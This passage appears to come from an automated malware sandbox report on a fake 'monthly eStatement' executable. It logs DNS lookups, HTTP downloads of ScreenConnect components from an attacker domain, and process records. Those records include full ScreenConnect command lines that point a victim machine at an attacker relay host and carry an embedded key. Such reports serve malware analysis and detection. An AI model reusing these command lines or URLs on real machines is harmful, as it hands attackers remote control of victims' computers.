                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.190105915 CET44349818194.59.30.201192.168.2.5

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 8, 2024 11:01:03.913659096 CET | 50622 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 8, 2024 11:01:03.926193953 CET | 53 | 50622 | 1.1.1.1 | 192.168.2.5 |
| Nov 8, 2024 11:01:42.508133888 CET | 55456 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 8, 2024 11:01:42.516788960 CET | 53 | 55456 | 1.1.1.1 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 8, 2024 11:01:03.913659096 CET | 192.168.2.5 | 1.1.1.1 | 0x3f43 | Standard query (0) | voicemail-lakeleft.top | A (IP address) | IN (0x0001) | false |
| Nov 8, 2024 11:01:42.508133888 CET | 192.168.2.5 | 1.1.1.1 | 0x83d6 | Standard query (0) | popwee2.zapto.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 8, 2024 11:01:03.926193953 CET | 1.1.1.1 | 192.168.2.5 | 0x3f43 | No error (0) | voicemail-lakeleft.top | | 194.59.30.201 | A (IP address) | IN (0x0001) | false |
| Nov 8, 2024 11:01:05.994802952 CET | 1.1.1.1 | 192.168.2.5 | 0x36d7 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Nov 8, 2024 11:01:05.994802952 CET | 1.1.1.1 | 192.168.2.5 | 0x36d7 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Nov 8, 2024 11:01:06.657273054 CET | 1.1.1.1 | 192.168.2.5 | 0x83d9 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 8, 2024 11:01:06.657273054 CET | 1.1.1.1 | 192.168.2.5 | 0x83d9 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Nov 8, 2024 11:01:08.360728979 CET | 1.1.1.1 | 192.168.2.5 | 0xaaa9 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 8, 2024 11:01:08.360728979 CET | 1.1.1.1 | 192.168.2.5 | 0xaaa9 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Nov 8, 2024 11:01:42.516788960 CET | 1.1.1.1 | 192.168.2.5 | 0x83d6 | No error (0) | popwee2.zapto.org | | 194.59.30.201 | A (IP address) | IN (0x0001) | false |

• voicemail-lakeleft.top

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49705 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe |

Timestamp: 2024-11-08 10:01:05 UTC | Bytes transferred: 635 | Direction: OUT | Data:
GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive

Timestamp: 2024-11-08 10:01:05 UTC | Bytes transferred: 251 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 117980
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:05 GMT
Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49711 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe |

Timestamp: 2024-11-08 10:01:07 UTC | Bytes transferred: 104 | Direction: OUT | Data:
GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip

Timestamp: 2024-11-08 10:01:07 UTC | Bytes transferred: 216 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17866
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:06 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49722 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:13 UTC | 106 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
2024-11-08 10:01:13 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:12 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49724 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:15 UTC | 138 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:01:15 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61216
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:15 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49726 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:16 UTC | 142 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:01:16 UTC | 214 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:16 GMT
Connection: close
2024-11-08 10:01:16 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49728 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:17 UTC | 137 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:01:17 UTC | 214 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:17 GMT
Connection: close
2024-11-08 10:01:17 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49731 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:18 UTC | 145 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:01:19 UTC | 214 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:19 GMT
Connection: close
2024-11-08 10:01:19 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49736 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:20 UTC | 135 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:01:20 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81696
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:20 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49743 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:21 UTC | 123 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:01:22 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:21 GMT
Connection: close


Session ID: 9
Source IP: 192.168.2.5
Source Port: 49756
Destination IP: 194.59.30.201
Destination Port: 443
PID: 6172
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-11-08 10:01:24 UTC; Bytes transferred: 130; Direction: OUT; Data:
GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive

Timestamp: 2024-11-08 10:01:24 UTC; Bytes transferred: 216; Direction: IN; Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:24 GMT
Connection: close


Session ID: 10
Source IP: 192.168.2.5
Source Port: 49767
Destination IP: 194.59.30.201
Destination Port: 443
PID: 6172
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-11-08 10:01:25 UTC; Bytes transferred: 100; Direction: OUT; Data:
GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip

Timestamp: 2024-11-08 10:01:26 UTC; Bytes transferred: 218; Direction: IN; Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:26 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49802 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:31 UTC | 106 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
2024-11-08 10:01:32 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 601376
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:31 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49818 | 194.59.30.201 | 443 | 6172 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:01:36 UTC | 97 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
2024-11-08 10:01:36 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548864
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:01:35 GMT
Connection: close



                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:05:00:59
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                                                                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                                                                  File size:83'376 bytes
                                                                                                                                                                                                                                                  MD5 hash:27BD2490FD75556AAB2DF57EA7C1147F
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:05:01:00
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                  Imagebase:0x25d1b9d0000
                                                                                                                                                                                                                                                  File size:24'856 bytes
                                                                                                                                                                                                                                                  MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:05:01:02
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:05:01:02
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                                                                                                                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:05:01:03
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700
                                                                                                                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:05:01:03
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:05:01:03
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:05:01:40
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:05:01:40
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:05:01:40
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                  Imagebase:0x9b0000
                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:05:01:41
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User"
                                                                                                                                                                                                                                                  Imagebase:0x990000
                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:false


                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:3.8%
                                                                                                                                                                                                                                                    Total number of Nodes:1464
                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
